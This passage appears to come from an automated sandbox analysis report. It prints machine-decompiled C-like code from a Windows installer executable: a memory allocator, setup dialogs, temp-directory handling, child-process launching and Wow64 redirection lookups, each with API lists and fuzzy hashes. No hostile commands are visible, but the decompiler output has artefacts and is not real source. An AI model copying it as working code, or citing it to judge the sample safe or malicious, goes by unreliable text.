                                                            									_t99 = 0;
                                                            								}
                                                            							}
                                                            							L10:
                                                            							if(_t99 == 0) {
                                                            								 *_v48 =  *_t116;
                                                            								 *( *_t116 + 4) = _v48;
                                                            							}
                                                            							 *0x4bdb78 = 0;
                                                            							return _t99;
                                                            						} else {
                                                            							return 0xffffffff;
                                                            						}
                                                            					} else {
                                                            						goto L31;
                                                            					}
                                                            				} else {
                                                            					__eflags = __bl;
                                                            					__ebx =  *__edx;
                                                            					if(__eflags != 0) {
                                                            						while(1) {
                                                            							__eax = 0x100;
                                                            							asm("lock cmpxchg [ebx], ah");
                                                            							if(__eflags == 0) {
                                                            								goto L14;
                                                            							}
                                                            							asm("pause");
                                                            							__eflags =  *0x4bb989;
                                                            							if(__eflags != 0) {
                                                            								continue;
                                                            							} else {
                                                            								Sleep(0);
                                                            								__edx = __edx;
                                                            								__ecx = __ecx;
                                                            								__eax = 0x100;
                                                            								asm("lock cmpxchg [ebx], ah");
                                                            								if(__eflags != 0) {
                                                            									Sleep(0xa);
                                                            									__edx = __edx;
                                                            									__ecx = __ecx;
                                                            									continue;
                                                            								}
                                                            							}
                                                            							goto L14;
                                                            						}
                                                            					}
                                                            					L14:
                                                            					_t14 = __edx + 0x14;
                                                            					 *_t14 =  *(__edx + 0x14) - 1;
                                                            					__eflags =  *_t14;
                                                            					__eax =  *(__edx + 0x10);
                                                            					if( *_t14 == 0) {
                                                            						__eflags = __eax;
                                                            						if(__eax == 0) {
                                                            							L20:
                                                            							 *(__ebx + 0x14) = __eax;
                                                            						} else {
                                                            							__eax =  *(__edx + 0xc);
                                                            							__ecx =  *(__edx + 8);
                                                            							 *(__eax + 8) = __ecx;
                                                            							 *(__ecx + 0xc) = __eax;
                                                            							__eax = 0;
                                                            							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
                                                            							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
                                                            								goto L20;
                                                            							}
                                                            						}
                                                            						 *__ebx = __al;
                                                            						__eax = __edx;
                                                            						__edx =  *(__edx - 4);
                                                            						__bl =  *0x4bb059; // 0x0
                                                            						L31:
                                                            						__eflags = _t78;
                                                            						_t81 = _t89 & 0xfffffff0;
                                                            						_push(_t101);
                                                            						_t106 = _t56;
                                                            						if(__eflags != 0) {
                                                            							while(1) {
                                                            								_t67 = 0x100;
                                                            								asm("lock cmpxchg [0x4bbae8], ah");
                                                            								if(__eflags == 0) {
                                                            									goto L32;
                                                            								}
                                                            								asm("pause");
                                                            								__eflags =  *0x4bb989;
                                                            								if(__eflags != 0) {
                                                            									continue;
                                                            								} else {
                                                            									Sleep(0);
                                                            									_t67 = 0x100;
                                                            									asm("lock cmpxchg [0x4bbae8], ah");
                                                            									if(__eflags != 0) {
                                                            										Sleep(0xa);
                                                            										continue;
                                                            									}
                                                            								}
                                                            								goto L32;
                                                            							}
                                                            						}
                                                            						L32:
                                                            						__eflags = (_t106 - 4)[_t81] & 0x00000001;
                                                            						_t87 = (_t106 - 4)[_t81];
                                                            						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
                                                            							_t67 = _t81 + _t106;
                                                            							_t88 = _t87 & 0xfffffff0;
                                                            							_t81 = _t81 + _t88;
                                                            							__eflags = _t88 - 0xb30;
                                                            							if(_t88 >= 0xb30) {
                                                            								_t67 = E00403AC0(_t67);
                                                            							}
                                                            						} else {
                                                            							_t88 = _t87 | 0x00000008;
                                                            							__eflags = _t88;
                                                            							(_t106 - 4)[_t81] = _t88;
                                                            						}
                                                            						__eflags =  *(_t106 - 4) & 0x00000008;
                                                            						if(( *(_t106 - 4) & 0x00000008) != 0) {
                                                            							_t88 =  *(_t106 - 8);
                                                            							_t106 = _t106 - _t88;
                                                            							_t81 = _t81 + _t88;
                                                            							__eflags = _t88 - 0xb30;
                                                            							if(_t88 >= 0xb30) {
                                                            								_t67 = E00403AC0(_t106);
                                                            							}
                                                            						}
                                                            						__eflags = _t81 - 0x13ffe0;
                                                            						if(_t81 == 0x13ffe0) {
                                                            							__eflags =  *0x4bbaf0 - 0x13ffe0;
                                                            							if( *0x4bbaf0 != 0x13ffe0) {
                                                            								_t82 = _t106 + 0x13ffe0;
                                                            								E00403B60(_t67);
                                                            								 *((intOrPtr*)(_t82 - 4)) = 2;
                                                            								 *0x4bbaf0 = 0x13ffe0;
                                                            								 *0x4bbaec = _t82;
                                                            								 *0x4bbae8 = 0;
                                                            								__eflags = 0;
                                                            								return 0;
                                                            							} else {
                                                            								_t108 = _t106 - 0x10;
                                                            								_t70 =  *_t108;
                                                            								_t96 =  *(_t108 + 4);
                                                            								 *(_t70 + 4) = _t96;
                                                            								 *_t96 = _t70;
                                                            								 *0x4bbae8 = 0;
                                                            								_t71 = VirtualFree(_t108, 0, 0x8000);
                                                            								__eflags = _t71 - 1;
                                                            								asm("sbb eax, eax");
                                                            								return _t71;
                                                            							}
                                                            						} else {
                                                            							 *(_t106 - 4) = _t81 + 3;
                                                            							 *(_t106 - 8 + _t81) = _t81;
                                                            							E00403B00(_t106, _t88, _t81);
                                                            							 *0x4bbae8 = 0;
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            					} else {
                                                            						__eflags = __eax;
                                                            						 *(__edx + 0x10) = __ecx;
                                                            						 *(__ecx - 4) = __eax;
                                                            						if(__eflags == 0) {
                                                            							__ecx =  *(__ebx + 8);
                                                            							 *(__edx + 0xc) = __ebx;
                                                            							 *(__edx + 8) = __ecx;
                                                            							 *(__ecx + 0xc) = __edx;
                                                            							 *(__ebx + 8) = __edx;
                                                            							 *__ebx = 0;
                                                            							__eax = 0;
                                                            							__eflags = 0;
                                                            							_pop(__ebx);
                                                            							return 0;
                                                            						} else {
                                                            							__eax = 0;
                                                            							__eflags = 0;
                                                            							 *__ebx = __al;
                                                            							_pop(__ebx);
                                                            							return 0;
                                                            						}
                                                            					}
                                                            				}
                                                            			}


                                                            APIs
                                                            • Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                            • Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
                                                            • Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                            • Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t31;
                                                            				intOrPtr _t37;
                                                            				intOrPtr _t38;
                                                            				intOrPtr _t42;
                                                            				intOrPtr _t44;
                                                            				intOrPtr _t47;
                                                            				intOrPtr _t51;
                                                            				intOrPtr _t53;
                                                            				intOrPtr _t55;
                                                            				intOrPtr _t56;
                                                            				intOrPtr _t59;
                                                            				intOrPtr _t61;
                                                            				WCHAR* _t63;
                                                            				intOrPtr _t69;
                                                            				intOrPtr _t74;
                                                            				int _t75;
                                                            				intOrPtr _t76;
                                                            				intOrPtr _t78;
                                                            				struct HWND__* _t81;
                                                            				intOrPtr _t82;
                                                            				intOrPtr _t86;
                                                            				void* _t90;
                                                            				intOrPtr _t93;
                                                            				intOrPtr _t99;
                                                            				intOrPtr _t101;
                                                            				intOrPtr _t107;
                                                            				intOrPtr _t114;
                                                            				intOrPtr _t115;
                                                            				intOrPtr _t116;
                                                            				intOrPtr _t117;
                                                            				void* _t120;
                                                            				intOrPtr _t121;
                                                            
                                                            				_t119 = __esi;
                                                            				_t118 = __edi;
                                                            				_t85 = __ebx;
                                                            				_pop(_t101);
                                                            				_pop(_t88);
                                                            				 *[fs:eax] = _t101;
                                                            				E004AF678(_t88);
                                                            				if( *0x4ba440 == 0) {
                                                            					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
                                                            						_t61 =  *0x4ba674; // 0x4c0d0c
                                                            						_t4 = _t61 + 0x2f8; // 0x0
                                                            						_t63 = E004084EC( *_t4);
                                                            						_t88 = _t120 - 0x28;
                                                            						_t101 =  *0x4c1c48; // 0x0
                                                            						E00426F08(0xc2, _t120 - 0x28, _t101);
                                                            						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
                                                            							 *0x4ba44c = 2;
                                                            							E0041F238();
                                                            						}
                                                            					}
                                                            					E004056D0();
                                                            					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
                                                            					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
                                                            					_t26 =  *0x4c1d84; // 0x0
                                                            					E00422954(_t26, _t88, _t120 - 0x34);
                                                            					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
                                                            					_push( *((intOrPtr*)(_t120 - 0x30)));
                                                            					_t31 =  *0x4c1d94; // 0x0
                                                            					E00422660(_t31, _t120 - 0x38);
                                                            					_pop(_t90);
                                                            					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
                                                            					_t107 =  *0x4c1d98; // 0x0
                                                            					E00407E00(0x4c1d9c, _t107);
                                                            					_t37 =  *0x4c1d90; // 0x4d703c
                                                            					_t15 = _t37 + 0x14; // 0x41c6fb
                                                            					_t38 =  *0x4c1d88; // 0x0
                                                            					E00423CE8(_t38,  *_t15);
                                                            					_push(_t120);
                                                            					_push(0x4b63ab);
                                                            					_push( *[fs:edx]);
                                                            					 *[fs:edx] = _t121;
                                                            					 *0x4c1de0 = 0;
                                                            					_t42 = E00423D00(1, 0, 1, 0); // executed
                                                            					 *0x4c1d8c = _t42;
                                                            					_push(_t120);
                                                            					_push(0x4b639a);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t121;
                                                            					_t44 =  *0x4c1d90; // 0x4d703c
                                                            					_t16 = _t44 + 0x18; // 0x30be00
                                                            					 *0x4c1de0 = E004053F0( *_t16);
                                                            					_t47 =  *0x4c1d90; // 0x4d703c
                                                            					_t17 = _t47 + 0x18; // 0x30be00
                                                            					_t86 =  *0x4c1de0; // 0x7fba0010
                                                            					E00405884(_t86,  *_t17);
                                                            					_push(_t120);
                                                            					_push(0x4b62e9);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t121;
                                                            					_t51 =  *0x424cd8; // 0x424d30
                                                            					_t93 =  *0x4c1d88; // 0x0
                                                            					_t53 = E00424748(_t93, 1, _t51); // executed
                                                            					 *0x4c1de4 = _t53;
                                                            					_push(_t120);
                                                            					_push(0x4b62d8);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t121;
                                                            					_t55 =  *0x4c1d90; // 0x4d703c
                                                            					_t18 = _t55 + 0x18; // 0x30be00
                                                            					_t56 =  *0x4c1de4; // 0x22bac00
                                                            					E00424A24(_t56,  *_t18, _t86);
                                                            					_pop(_t114);
                                                            					 *[fs:eax] = _t114;
                                                            					_push(E004B62DF);
                                                            					_t59 =  *0x4c1de4; // 0x22bac00
                                                            					return E00405CE8(_t59);
                                                            				} else {
                                                            					_t69 =  *0x4ba674; // 0x4c0d0c
                                                            					_t1 = _t69 + 0x1d0; // 0x0
                                                            					E004AFA44( *_t1, __ebx, __edi, __esi);
                                                            					 *0x4ba44c = 0;
                                                            					_pop(_t115);
                                                            					 *[fs:eax] = _t115;
                                                            					_push(E004B6554);
                                                            					_t74 =  *0x4c1d88; // 0x0
                                                            					_t75 = E00405CE8(_t74);
                                                            					if( *0x4c1d9c != 0) {
                                                            						_t117 =  *0x4c1d9c; // 0x0
                                                            						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
                                                            					}
                                                            					if( *0x4c1d94 != 0) {
                                                            						_t82 =  *0x4c1d94; // 0x0
                                                            						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
                                                            					}
                                                            					if( *0x4ba450 != 0) {
                                                            						_t81 =  *0x4ba450; // 0x302cc
                                                            						_t75 = DestroyWindow(_t81); // executed
                                                            					}
                                                            					if( *0x4c1d78 != 0) {
                                                            						_t76 =  *0x4c1d78; // 0x0
                                                            						_t99 =  *0x4c1d7c; // 0x1
                                                            						_t116 =  *0x426bb0; // 0x426bb4
                                                            						E00408D08(_t76, _t99, _t116);
                                                            						_t78 =  *0x4c1d78; // 0x0
                                                            						E0040540C(_t78);
                                                            						 *0x4c1d78 = 0;
                                                            						return 0;
                                                            					}
                                                            					return _t75;
                                                            				}
                                                            			}


                                                            APIs
                                                            • MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179
                                                              • Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                            • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                            • DestroyWindow.USER32(000302CC,004B6554), ref: 004B6514
                                                              • Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                              • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                              • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
                                                            • String ID: .tmp$0MB$<pM
                                                            • API String ID: 3858953238-1900878030
                                                            • Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                            • Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
                                                            • Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                            • Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
                                                            			E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                            				char _v8;
                                                            				struct _STARTUPINFOW _v76;
                                                            				void* _v88;
                                                            				void* _v92;
                                                            				int _t23;
                                                            				intOrPtr _t49;
                                                            				DWORD* _t51;
                                                            				void* _t56;
                                                            
                                                            				_v8 = 0;
                                                            				_t51 = __ecx;
                                                            				_t53 = __edx;
                                                            				_t41 = __eax;
                                                            				_push(_t56);
                                                            				_push(0x4af7ff);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t56 + 0xffffffa8;
                                                            				_push(0x4af81c);
                                                            				_push(__eax);
                                                            				_push(0x4af82c);
                                                            				_push(__edx);
                                                            				E004087C4( &_v8, __eax, 4, __ecx, __edx);
                                                            				E00405884( &_v76, 0x44);
                                                            				_v76.cb = 0x44;
                                                            				_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
                                                            				_t58 = _t23;
                                                            				if(_t23 == 0) {
                                                            					E004AF34C(0x83, _t41, 0, _t53, _t58);
                                                            				}
                                                            				CloseHandle(_v88);
                                                            				do {
                                                            					E004AF6FC();
                                                            				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1);
                                                            				E004AF6FC();
                                                            				GetExitCodeProcess(_v92, _t51); // executed
                                                            				CloseHandle(_v92);
                                                            				_pop(_t49);
                                                            				 *[fs:eax] = _t49;
                                                            				_push(0x4af806);
                                                            				return E00407A20( &_v8);
                                                            			}


                                                            APIs
                                                            • CreateProcessW.KERNEL32 ref: 004AF798
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                            • MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                            • GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                            • CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                              • Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                            • String ID: D
                                                            • API String ID: 3356880605-2746444292
                                                            • Opcode ID: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                            • Instruction ID: 88989adc3f1fa39a5a5eb6990527994e2deb527bcdcae90bffb7d35c0d41af56
                                                            • Opcode Fuzzy Hash: ad1163668f60b09aa263e635df1463f1e4b37e8a5aa9c4cbf2e159c77cef0046
                                                            • Instruction Fuzzy Hash: C01163716041096EEB00FBE68C42F9F77ACDF56714F50053AB604E72C5DA789905866D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E004B5A90(void* __ebx, void* __ecx, void* __edx, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _t16;
                                                            				intOrPtr _t32;
                                                            				intOrPtr _t41;
                                                            
                                                            				_t27 = __ebx;
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(_t41);
                                                            				_push(0x4b5b5a);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t41;
                                                            				 *0x4c1124 =  *0x4c1124 - 1;
                                                            				if( *0x4c1124 < 0) {
                                                            					 *0x4c1128 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
                                                            					 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
                                                            					if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
                                                            						_t16 = 0;
                                                            					} else {
                                                            						_t16 = 1;
                                                            					}
                                                            					 *0x4c1130 = _t16;
                                                            					E00422D44( &_v12);
                                                            					E00422660(_v12,  &_v8);
                                                            					E004086E4( &_v8, L"shell32.dll");
                                                            					E00421230(_v8, _t27, 0x8000); // executed
                                                            					E004232EC(0x4c783afb,  &_v16);
                                                            				}
                                                            				_pop(_t32);
                                                            				 *[fs:eax] = _t32;
                                                            				_push(0x4b5b61);
                                                            				return E00407A80( &_v16, 3);
                                                            			}










                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                            • API String ID: 1646373207-2130885113
                                                            • Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                            • Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
                                                            • Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                            • Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E00403EE8(signed int __eax) {
                                                            				signed int __ebx;
                                                            				signed int __edi;
                                                            				signed int __esi;
                                                            				void* _t96;
                                                            				void** _t99;
                                                            				signed int _t104;
                                                            				signed int _t109;
                                                            				signed int _t110;
                                                            				intOrPtr* _t114;
                                                            				void* _t116;
                                                            				void* _t121;
                                                            				signed int _t125;
                                                            				signed int _t129;
                                                            				signed int _t131;
                                                            				signed int _t132;
                                                            				signed int _t133;
                                                            				signed int _t134;
                                                            				signed int _t135;
                                                            				unsigned int _t141;
                                                            				signed int _t142;
                                                            				void* _t144;
                                                            				void* _t147;
                                                            				intOrPtr _t148;
                                                            				signed int _t150;
                                                            				long _t156;
                                                            				intOrPtr _t159;
                                                            				signed int _t162;
                                                            
                                                            				_t95 = __eax;
                                                            				_t129 =  *0x4bb059; // 0x0
                                                            				if(__eax > 0xa2c) {
                                                            					__eflags = __eax - 0x40a2c;
                                                            					if(__eax > 0x40a2c) {
                                                            						_pop(_t120);
                                                            						__eflags = __eax;
                                                            						if(__eax >= 0) {
                                                            							_push(_t120);
                                                            							_t162 = __eax;
                                                            							_t2 = _t162 + 0x10010; // 0x10110
                                                            							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
                                                            							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
                                                            							_t121 = _t96;
                                                            							if(_t121 != 0) {
                                                            								_t147 = _t121;
                                                            								 *((intOrPtr*)(_t147 + 8)) = _t162;
                                                            								 *(_t147 + 0xc) = _t156 | 0x00000004;
                                                            								E00403C48();
                                                            								_t99 =  *0x4bdb80; // 0x4bdb7c
                                                            								 *_t147 = 0x4bdb7c;
                                                            								 *0x4bdb80 = _t121;
                                                            								 *(_t147 + 4) = _t99;
                                                            								 *_t99 = _t121;
                                                            								 *0x4bdb78 = 0;
                                                            								_t121 = _t121 + 0x10;
                                                            							}
                                                            							return _t121;
                                                            						} else {
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            					} else {
                                                            						_t67 = _t95 + 0xd3; // 0x1d3
                                                            						_t125 = (_t67 & 0xffffff00) + 0x30;
                                                            						__eflags = _t129;
                                                            						if(__eflags != 0) {
                                                            							while(1) {
                                                            								asm("lock cmpxchg [0x4bbae8], ah");
                                                            								if(__eflags == 0) {
                                                            									goto L42;
                                                            								}
                                                            								asm("pause");
                                                            								__eflags =  *0x4bb989;
                                                            								if(__eflags != 0) {
                                                            									continue;
                                                            								} else {
                                                            									Sleep(0);
                                                            									asm("lock cmpxchg [0x4bbae8], ah");
                                                            									if(__eflags != 0) {
                                                            										Sleep(0xa);
                                                            										continue;
                                                            									}
                                                            								}
                                                            								goto L42;
                                                            							}
                                                            						}
                                                            						L42:
                                                            						_t68 = _t125 - 0xb30; // -2445
                                                            						_t141 = _t68;
                                                            						_t142 = _t141 >> 0xd;
                                                            						_t131 = _t141 >> 8;
                                                            						_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4);
                                                            						__eflags = 0xffffffff;
                                                            						if(0xffffffff == 0) {
                                                            							_t132 = _t142;
                                                            							__eflags = 0xfffffffe << _t132 &  *0x4bbaf4;
                                                            							if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
                                                            								_t133 =  *0x4bbaf0; // 0x0
                                                            								_t134 = _t133 - _t125;
                                                            								__eflags = _t134;
                                                            								if(_t134 < 0) {
                                                            									_t109 = E00403BCC(_t125);
                                                            								} else {
                                                            									_t110 =  *0x4bbaec; // 0x22aaad0
                                                            									_t109 = _t110 - _t125;
                                                            									 *0x4bbaec = _t109;
                                                            									 *0x4bbaf0 = _t134;
                                                            									 *(_t109 - 4) = _t125 | 0x00000002;
                                                            								}
                                                            								 *0x4bbae8 = 0;
                                                            								return _t109;
                                                            							} else {
                                                            								asm("bsf edx, eax");
                                                            								asm("bsf ecx, eax");
                                                            								_t135 = _t132 | _t142 << 0x00000005;
                                                            								goto L50;
                                                            							}
                                                            						} else {
                                                            							asm("bsf eax, eax");
                                                            							_t135 = _t131 & 0xffffffe0 | _t104;
                                                            							L50:
                                                            							_push(_t152);
                                                            							_push(_t145);
                                                            							_t148 = 0x4bbb78 + _t135 * 8;
                                                            							_t159 =  *((intOrPtr*)(_t148 + 4));
                                                            							_t114 =  *((intOrPtr*)(_t159 + 4));
                                                            							 *((intOrPtr*)(_t148 + 4)) = _t114;
                                                            							 *_t114 = _t148;
                                                            							__eflags = _t148 - _t114;
                                                            							if(_t148 == _t114) {
                                                            								asm("rol eax, cl");
                                                            								_t80 = 0x4bbaf8 + _t142 * 4;
                                                            								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
                                                            								__eflags =  *_t80;
                                                            								if( *_t80 == 0) {
                                                            									asm("btr [0x4bbaf4], edx");
                                                            								}
                                                            							}
                                                            							_t150 = 0xfffffff0 &  *(_t159 - 4);
                                                            							_t144 = 0xfffffff0 - _t125;
                                                            							__eflags = 0xfffffff0;
                                                            							if(0xfffffff0 == 0) {
                                                            								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
                                                            								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
                                                            								__eflags =  *_t89;
                                                            							} else {
                                                            								_t116 = _t125 + _t159;
                                                            								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
                                                            								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
                                                            								__eflags = 0xfffffff0 - 0xb30;
                                                            								if(0xfffffff0 >= 0xb30) {
                                                            									E00403B00(_t116, 0xfffffffffffffff3, _t144);
                                                            								}
                                                            							}
                                                            							_t93 = _t125 + 2; // 0x1a5
                                                            							 *(_t159 - 4) = _t93;
                                                            							 *0x4bbae8 = 0;
                                                            							return _t159;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					__eflags = __cl;
                                                            					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
                                                            					__eax =  *_t6 & 0x000000ff;
                                                            					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
                                                            					if(__eflags != 0) {
                                                            						while(1) {
                                                            							__eax = 0x100;
                                                            							asm("lock cmpxchg [ebx], ah");
                                                            							if(__eflags == 0) {
                                                            								goto L5;
                                                            							}
                                                            							__ebx = __ebx + 0x20;
                                                            							__eflags = __ebx;
                                                            							__eax = 0x100;
                                                            							asm("lock cmpxchg [ebx], ah");
                                                            							if(__ebx != 0) {
                                                            								__ebx = __ebx + 0x20;
                                                            								__eflags = __ebx;
                                                            								__eax = 0x100;
                                                            								asm("lock cmpxchg [ebx], ah");
                                                            								if(__ebx != 0) {
                                                            									__ebx = __ebx - 0x40;
                                                            									asm("pause");
                                                            									__eflags =  *0x4bb989;
                                                            									if(__eflags != 0) {
                                                            										continue;
                                                            									} else {
                                                            										Sleep(0);
                                                            										__eax = 0x100;
                                                            										asm("lock cmpxchg [ebx], ah");
                                                            										if(__eflags != 0) {
                                                            											Sleep(0xa);
